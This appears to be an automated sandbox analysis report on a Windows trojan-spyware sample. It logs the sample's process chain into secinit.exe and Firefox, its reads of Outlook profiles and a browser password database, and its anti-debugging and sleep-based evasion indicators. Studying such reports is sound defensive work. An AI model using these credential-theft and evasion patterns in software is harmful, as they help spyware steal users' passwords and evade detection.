        Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/22@21/14
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: 5_2_0040442A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: 5_2_00402036 CoCreateInstance,MultiByteToWideChar
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | File created: C:\Users\user\AppData\Local\Lumbagoen.lnk
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | File created: C:\Users\user\AppData\Local\Temp\nssB994.tmp
        Source: fJuwM4Bwi7.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: secinit.exe, 0000000A.00000003.79359965407.0000000002828000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79359811784.0000000002807000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83832065091.0000000002828000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: fJuwM4Bwi7.exe | ReversingLabs: Detection: 52%
        Source: fJuwM4Bwi7.exe | Virustotal: Detection: 55%
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | File read: C:\Users\user\Desktop\fJuwM4Bwi7.exe
        Source: unknown | Process created: C:\Users\user\Desktop\fJuwM4Bwi7.exe "C:\Users\user\Desktop\fJuwM4Bwi7.exe"
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Process created: C:\Users\user\Desktop\fJuwM4Bwi7.exe "C:\Users\user\Desktop\fJuwM4Bwi7.exe"
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | Process created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"
        Source: C:\Windows\SysWOW64\secinit.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: version.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: shfolder.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: riched20.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: usp10.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: msls31.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: textinputframework.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: coreuicomponents.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: coremessaging.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: textshaping.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: powrprof.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: wkscli.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: umpdc.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: schannel.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: mskeyprotect.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: ntasn1.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: msasn1.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: dpapi.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: gpapi.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: ncrypt.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Section loaded: ncryptsslp.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: wkscli.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: wininet.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: ieframe.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: netapi32.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: version.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: winhttp.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: secur32.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: mlang.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: propsys.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: winsqlite3.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: vaultcli.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: wintypes.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\secinit.exe | Section loaded: cryptbase.dll
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | Section loaded: wininet.dll
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | Section loaded: mswsock.dll
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | Section loaded: dnsapi.dll
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | Section loaded: iphlpapi.dll
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | Section loaded: fwpuclnt.dll
        Source: C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: Lumbagoen.lnk.5.dr | LNK file: ..\..\..\..\Windows\system32\scups\deployerende.emb
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | File written: C:\Users\user\AppData\Local\Temp\Settings.ini
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\secinit.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: fJuwM4Bwi7.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SLePhgUCFUcrYZVod.exe, 00000009.00000000.79101394291.0000000000A2E000.00000002.00000001.01000000.0000000A.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83830927716.0000000000A2E000.00000002.00000001.01000000.0000000A.sdmp
        Source: Binary string: secinit.pdbGCTL source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002688000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000267E000.00000004.00000020.00020000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 00000009.00000002.83832206009.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: fJuwM4Bwi7.exe, 00000008.00000003.79086644486.0000000032739000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79082655954.000000003258A000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83834030680.0000000002D2D000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79182431961.0000000002A53000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83834030680.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79178692892.00000000028A4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: fJuwM4Bwi7.exe, fJuwM4Bwi7.exe, 00000008.00000003.79086644486.0000000032739000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79082655954.000000003258A000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83834030680.0000000002D2D000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79182431961.0000000002A53000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83834030680.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79178692892.00000000028A4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: secinit.pdb source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002688000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000267E000.00000004.00000020.00020000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 00000009.00000002.83832206009.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: Yara match | File source: 00000005.00000002.79055979562.0000000004FBC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: 5_2_00406061 GetModuleHandleA,LoadLibraryA,GetProcAddress
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: 5_2_10002D30 push eax; ret | 5_2_10002D5E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: 8_2_328EE060 push eax; retf 0008h | 8_2_328EE06D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: 8_2_328EE074 pushfd ; retf | 8_2_328EE075
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: 8_2_328E21AD pushad ; retf 0004h | 8_2_328E223F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: 8_2_328E97A1 push es; iretd | 8_2_328E97A8
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: 8_2_329108CD push ecx; mov dword ptr [esp], ecx | 8_2_329108D6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | File created: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\secinit.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: 8_2_32951763 rdtsc
        Source: C:\Windows\SysWOW64\secinit.exe | Window / User API: threadDelayed 9014
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | API coverage: 0.2 %
        Source: C:\Windows\SysWOW64\secinit.exe TID: 768 | Thread sleep count: 121 > 30
        Source: C:\Windows\SysWOW64\secinit.exe TID: 768 | Thread sleep time: -242000s >= -30000s
        Source: C:\Windows\SysWOW64\secinit.exe TID: 768 | Thread sleep count: 9014 > 30
        Source: C:\Windows\SysWOW64\secinit.exe TID: 768 | Thread sleep time: -18028000s >= -30000s
        Source: C:\Windows\SysWOW64\secinit.exe | Last function: Thread delayed
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: 5_2_0040603A FindFirstFileA,FindClose
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: 5_2_004055F6 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: 5_2_00402645 FindFirstFileA
        Source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000263E000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79083772422.0000000002688000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002688000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83832592696.000000000136F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
        Source: secinit.exe, 0000000A.00000002.83832065091.00000000027B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.79471496024.000001A4E29BD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | API call chain: ExitProcess graph end node | graph_5-4273
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | API call chain: ExitProcess graph end node | graph_5-4435
        Source: C:\Windows\SysWOW64\secinit.exe | Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\secinit.exe | Process queried: DebugPort
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: 8_2_32951763 rdtsc
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: 8_2_329534E0 NtCreateMutant,LdrInitializeThunk
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: 5_2_00406061 GetModuleHandleA,LoadLibraryA,GetProcAddress
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exe | Code function: 8_2_32917290 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A327E mov eax, dword ptr fs:[00000030h]8_2_329A327E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A327E mov eax, dword ptr fs:[00000030h]8_2_329A327E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A327E mov eax, dword ptr fs:[00000030h]8_2_329A327E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A327E mov eax, dword ptr fs:[00000030h]8_2_329A327E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A327E mov eax, dword ptr fs:[00000030h]8_2_329A327E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CD270 mov eax, dword ptr fs:[00000030h]8_2_329CD270
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293A390 mov eax, dword ptr fs:[00000030h]8_2_3293A390
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293A390 mov eax, dword ptr fs:[00000030h]8_2_3293A390
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293A390 mov eax, dword ptr fs:[00000030h]8_2_3293A390
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32911380 mov eax, dword ptr fs:[00000030h]8_2_32911380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32911380 mov eax, dword ptr fs:[00000030h]8_2_32911380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32911380 mov eax, dword ptr fs:[00000030h]8_2_32911380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32911380 mov eax, dword ptr fs:[00000030h]8_2_32911380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32911380 mov eax, dword ptr fs:[00000030h]8_2_32911380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292F380 mov eax, dword ptr fs:[00000030h]8_2_3292F380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292F380 mov eax, dword ptr fs:[00000030h]8_2_3292F380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292F380 mov eax, dword ptr fs:[00000030h]8_2_3292F380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292F380 mov eax, dword ptr fs:[00000030h]8_2_3292F380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292F380 mov eax, dword ptr fs:[00000030h]8_2_3292F380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292F380 mov eax, dword ptr fs:[00000030h]8_2_3292F380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CF38A mov eax, dword ptr fs:[00000030h]8_2_329CF38A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298C3B0 mov eax, dword ptr fs:[00000030h]8_2_3298C3B0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329193A6 mov eax, dword ptr fs:[00000030h]8_2_329193A6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329193A6 mov eax, dword ptr fs:[00000030h]8_2_329193A6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329433D0 mov eax, dword ptr fs:[00000030h]8_2_329433D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329443D0 mov ecx, dword ptr fs:[00000030h]8_2_329443D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329943D5 mov eax, dword ptr fs:[00000030h]8_2_329943D5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290E3C0 mov eax, dword ptr fs:[00000030h]8_2_3290E3C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290E3C0 mov eax, dword ptr fs:[00000030h]8_2_3290E3C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290E3C0 mov eax, dword ptr fs:[00000030h]8_2_3290E3C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290C3C7 mov eax, dword ptr fs:[00000030h]8_2_3290C3C7
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329163CB mov eax, dword ptr fs:[00000030h]8_2_329163CB
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292E310 mov eax, dword ptr fs:[00000030h]8_2_3292E310
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292E310 mov eax, dword ptr fs:[00000030h]8_2_3292E310
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292E310 mov eax, dword ptr fs:[00000030h]8_2_3292E310
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32909303 mov eax, dword ptr fs:[00000030h]8_2_32909303
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32909303 mov eax, dword ptr fs:[00000030h]8_2_32909303
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CF30A mov eax, dword ptr fs:[00000030h]8_2_329CF30A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E3336 mov eax, dword ptr fs:[00000030h]8_2_329E3336
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290E328 mov eax, dword ptr fs:[00000030h]8_2_3290E328
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290E328 mov eax, dword ptr fs:[00000030h]8_2_3290E328
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290E328 mov eax, dword ptr fs:[00000030h]8_2_3290E328
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293332D mov eax, dword ptr fs:[00000030h]8_2_3293332D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32908347 mov eax, dword ptr fs:[00000030h]8_2_32908347
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32908347 mov eax, dword ptr fs:[00000030h]8_2_32908347
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32908347 mov eax, dword ptr fs:[00000030h]8_2_32908347
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32990371 mov eax, dword ptr fs:[00000030h]8_2_32990371
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32990371 mov eax, dword ptr fs:[00000030h]8_2_32990371
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293237A mov eax, dword ptr fs:[00000030h]8_2_3293237A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E372 mov eax, dword ptr fs:[00000030h]8_2_3298E372
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E372 mov eax, dword ptr fs:[00000030h]8_2_3298E372
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E372 mov eax, dword ptr fs:[00000030h]8_2_3298E372
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E372 mov eax, dword ptr fs:[00000030h]8_2_3298E372
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B360 mov eax, dword ptr fs:[00000030h]8_2_3291B360
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B360 mov eax, dword ptr fs:[00000030h]8_2_3291B360
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B360 mov eax, dword ptr fs:[00000030h]8_2_3291B360
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B360 mov eax, dword ptr fs:[00000030h]8_2_3291B360
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B360 mov eax, dword ptr fs:[00000030h]8_2_3291B360
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B360 mov eax, dword ptr fs:[00000030h]8_2_3291B360
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E363 mov eax, dword ptr fs:[00000030h]8_2_3294E363
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E363 mov eax, dword ptr fs:[00000030h]8_2_3294E363
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E363 mov eax, dword ptr fs:[00000030h]8_2_3294E363
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E363 mov eax, dword ptr fs:[00000030h]8_2_3294E363
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E363 mov eax, dword ptr fs:[00000030h]8_2_3294E363
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E363 mov eax, dword ptr fs:[00000030h]8_2_3294E363
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E363 mov eax, dword ptr fs:[00000030h]8_2_3294E363
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E363 mov eax, dword ptr fs:[00000030h]8_2_3294E363
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290C090 mov eax, dword ptr fs:[00000030h]8_2_3290C090
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290A093 mov ecx, dword ptr fs:[00000030h]8_2_3290A093
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E4080 mov eax, dword ptr fs:[00000030h]8_2_329E4080
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E4080 mov eax, dword ptr fs:[00000030h]8_2_329E4080
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E4080 mov eax, dword ptr fs:[00000030h]8_2_329E4080
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E4080 mov eax, dword ptr fs:[00000030h]8_2_329E4080
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E4080 mov eax, dword ptr fs:[00000030h]8_2_329E4080
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E4080 mov eax, dword ptr fs:[00000030h]8_2_329E4080
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E4080 mov eax, dword ptr fs:[00000030h]8_2_329E4080
